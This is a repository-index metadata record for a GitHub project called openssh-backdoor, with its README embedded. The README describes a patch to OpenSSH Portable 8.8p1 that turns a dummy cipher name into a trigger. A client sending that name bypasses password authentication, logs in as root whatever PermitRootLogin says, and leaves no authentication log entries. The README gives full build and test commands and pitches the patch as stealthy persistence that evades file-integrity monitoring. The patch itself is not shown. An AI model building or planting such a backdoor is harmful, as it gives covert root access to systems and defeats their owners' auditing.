{"id":20610888,"url":"https://github.com/psmths/openssh-backdoor","last_synced_at":"2026-02-18T00:31:55.533Z","repository":{"id":117461424,"uuid":"434408418","full_name":"Psmths/openssh-backdoor","owner":"Psmths","description":"Experimental and sneaky backdoor patch for OpenSSH Portable. ","archived":false,"fork":false,"pushed_at":"2021-12-21T01:19:04.000Z","size":14,"stargazers_count":24,"open_issues_count":0,"forks_count":8,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-10-20T12:59:09.578Z","etag":null,"topics":["backdoor","backdoor-attacks","openssh","patch","pentesting","pentesting-tools","red-team","ssh","ssh-server"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Psmths.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-12-02T23:43:06.000Z","updated_at":"2025-10-19T04:26:28.000Z","dependencies_parsed_at":null,"dependency_job_id":"ecc20cae-b8a6-4501-8041-ba01aa656f4d","html_url":"https://github.com/Psmths/openssh-backdoor","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/Psmths/openssh-backdoor","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Psmths%2Fopenssh-backdoor","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Psmths%2Fopenssh-backdoor/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Psmths%2Fopenssh-backdoor/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Psmths%2Fopenssh-backdoor/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Psmths","download_url":"https://codeload.github.com/Psmths/openssh-backdoor/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Psmths%2Fopenssh-backdoor/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29563467,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-17T21:50:49.831Z","status":"ssl_error","status_checked_at":"2026-02-17T21:46:15.313Z","response_time":100,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","backdoor-attacks","openssh","patch","pentesting","pentesting-tools","red-team","ssh","ssh-server"],"created_at":"2024-11-16T10:18:16.468Z","updated_at":"2026-02-18T00:31:55.502Z","avatar_url":"https://github.com/Psmths.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# openssh-backdoor\nExperimental backdoor for OpenSSH Portable. Patch for OpenSSH Portable v8.8_p1. For educational/ethical purposes only!\n\n## Why?\n\nConsider using this method when you want persistence, but:\n\n - FIM is monitoring configuration files, but not binaries\n - You don't want to create a new backdoor user \n - You don't want to deploy a reverse shell\n\n## How does it work?\n\nThis repo contains a patch for OpenSSH (server and client) to allow for a complete authentication bypass without modifying configuration files on the target server, adding new users, overwriting credentials, or deploying an implant such as a reverse shell. \n\nThe patch creates a dummy cipher suite, in this case `abs128-ctr` that functions as an activation phrase. Any client that sends this dummy cipher spec during the SSH [algorithm negotiation](https://datatracker.ietf.org/doc/html/rfc4253#section-7.1) will completely bypass PASSWD authentication on the patched server, and will also bypass authentication logging. Clients connecting with normal cipher specs will authenticate as normal.\n\nAdditionally, the patch overrides `PermitRootLogin`, allowing clients sending the activation phrase to login as root regardless of the OpenSSH server's restriction. \n\n## Installation and Patching \n\nThe following commands when issued will patch OpenSSH and produce a modified ssh client in `/tmp/ssh` and a modified server binary in `/tmp/sshd`. \n\n```\nwget https://github.com/openssh/openssh-portable/archive/refs/tags/V_8_8_P1.tar.gz\ngunzip V_8_8_P1.tar.gz\ntar xvf V_8_8_P1.tar\ngit clone https://github.com/Psmths/openssh-backdoor\ncp ./openssh-backdoor/*.patch ./openssh-portable-V_8_8_P1/\ncd openssh-portable-V_8_8_P1/\npatch -u auth-passwd.c -i auth-passwd.c.patch\npatch -u auth.c -i auth.c.patch\npatch -u cipher.c -i cipher.c.patch \npatch -u kex.c -i kex.c.patch\npatch -u kex.h -i kex.h.patch\npatch -u packet.h -i packet.h.patch\npatch -u packet.c -i packet.c.patch\npatch -u servconf.c -i servconf.c.patch\nautoreconf\n./configure --bindir=/tmp/ --sbindir=/tmp/\nmake -j 24\nsudo make install\n```\n\nTo test, run the modified server binary and set it to listen on some port:\n\n```\nsudo /tmp/sshd -p 9001\n```\n\nAttempt to authenticate without the special cipher suite string, and a bogus password. This should fail.\n```\n/tmp/ssh root@127.0.0.1 -p 9001 -c \"chacha20-poly1305@openssh.com\"\n```\n\nAttempt to authenticate with the special cipher suite string, in this case `abs128-ctr`, and a bogus password. This should seccessfully authenticate you as root. The backdoor authentication will not be logged either during login or logout. \n```\n/tmp/ssh root@127.0.0.1 -p 9001 -c \"abs128-ctr,chacha20-poly1305@openssh.com\"\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpsmths%2Fopenssh-backdoor","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpsmths%2Fopenssh-backdoor","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpsmths%2Fopenssh-backdoor/lists"}